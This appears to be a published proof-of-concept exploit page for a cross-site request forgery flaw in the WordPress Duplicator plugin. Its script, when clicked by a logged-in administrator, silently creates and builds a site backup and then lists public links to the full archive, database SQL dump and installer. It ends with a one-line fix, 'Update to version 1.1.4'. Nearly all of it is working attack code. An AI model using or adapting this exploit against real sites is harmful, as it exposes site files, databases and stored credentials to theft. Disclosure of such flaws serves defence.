<html> <body> <script> wordpress_root = "http://localhost/wordpress"; function submitRequest1() { var xhr = new XMLHttpRequest(); xhr.open("POST", wordpress_root + "/wp-admin/admin.php?page=duplicator&tab=new2", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5"); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.withCredentials = true; var body = "action=&package-hash=ratiosec&package-name=ratiosec&package-notes=&archive-format=ZIP&filter-dirs=&filter-exts=&dbhost=&dbport=&dbname=&dbuser=&url-new="; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } function submitRequest2() { var xhr = new XMLHttpRequest(); xhr.open("GET", wordpress_root + "/wp-admin/admin-ajax.php?action=duplicator_package_build", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5"); xhr.withCredentials = true; var body = ""; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } function printLinks() { var dumps = ["ratiosec_ratiosec_archive.zip", "ratiosec_ratiosec_database.sql", "ratiosec_ratiosec_installer.php"]; for(var a in dumps) { var url = wordpress_root + '/wp-snapshots/' + dumps[a]; document.body.innerHTML += '<br/><a href="' + url + '">' + url + '</a>'; }; } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest1();setTimeout(submitRequest2,2000);setTimeout(printLinks,2500);" /> </form> <p>Submit the CSRF request and wait few seconds to see below the public links of the dumps.</p> </body> </html>
Update to version 1.1.4.